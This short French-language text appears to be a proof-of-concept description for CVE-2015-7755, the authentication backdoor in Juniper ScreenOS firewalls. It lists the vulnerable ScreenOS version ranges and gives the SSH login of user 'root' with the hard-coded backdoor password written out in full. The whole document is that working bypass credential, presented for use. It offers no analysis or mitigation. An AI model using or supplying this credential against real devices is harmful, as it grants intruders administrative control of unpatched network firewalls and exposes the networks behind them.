
Preuve de concept pour CVE-2015-7755 ciblant le contournement d'authentification backdoor dans Juniper ScreenOS via SSH avec des identifiants root codés en dur.
Détection de vulnérabilité CVE-2015-7755
utiliser SSH pour se connecter à ces versions vulnérables :
ScreenOS 6.2.0r15—6.2.0r18,6.3.0r12—6.3.0r20 (Juniper Networks)
utilisateur : root
mot de passe : <<< %s(un='%s') = %u